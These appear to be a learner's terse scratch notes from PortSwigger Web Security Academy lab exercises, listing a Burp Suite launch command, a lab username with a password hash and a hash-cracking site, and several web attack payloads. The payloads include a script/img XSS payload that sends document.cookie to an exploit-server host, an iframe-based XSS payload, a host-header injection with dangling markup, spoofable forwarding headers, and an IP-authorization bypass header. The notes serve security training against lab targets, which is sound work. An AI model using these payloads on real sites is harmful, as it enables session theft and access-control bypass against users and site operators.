java -jar -Xmx4g /home/kali/Downloads/burpsuite.jar 



wiener:51dc30ddc473d43a6011e9ebba6ca770;

<script><img src=1 onerror="https://exploit-0a8900db040ebc43c0c51e6e01270013.web-security-academy.net/exploit?"+document.cookie></script>


https://crackstation.net/


Host: your-lab-id.web-security-academy.net:'<a href="//your-exploit-server-id.web-security-academy.net/?

X-Forwarded-For
X-Forwarded-Host
Host:


https://webhook.site/


<!-- <a href=/cgi-bin/phpinfo.php>Debug</a> -->


X-Custom-IP-Authorization: 127.0.0.1

<iframe src="https://0a9d00ea0479b5a5c0f05b2b007a00e0.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>